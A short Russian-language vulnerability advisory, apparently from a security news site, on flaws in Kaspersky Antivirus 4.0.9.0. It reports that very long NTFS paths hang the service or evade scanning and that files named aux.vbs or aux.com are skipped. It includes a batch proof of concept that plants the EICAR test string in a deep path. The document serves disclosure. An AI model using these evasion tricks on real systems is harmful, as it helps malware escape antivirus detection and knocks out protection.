Обнаружено несколько уязвимостей в "Антивирусе Касперского", которые могут использоваться для DoS атаки и обхода проверки злонамеренного кода.

1. Файловая система NTFS позволяет создавать пути почти неограниченной длины. Но Windows API не позволяет создавать пути длинее 256 байтов. Чтобы обойти это ограничение можно использовать в пути к файлу префикс ‘\\?\’ . Это зарегистрированная особенность Windows API. Путь,
длиннее 256 символов, приведет к зависанию KAV службы или заставит ее потреблять 100% ресурсов CPU. Возможно, уязвимость может использоваться для выполнения произвольного кода. Длинный путь может также использоваться для обхода проверки антивирусом.

Пример:
<pre>
@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7} $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
</pre>

2. NTFS файл с именем aux.vbs или aux.com, содержащий злонамеренный код, не будет проверен антивирусом.

Уязвимость обнаружена в Kaspersky Antivirus 4.0.9.0 и более ранних версиях.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии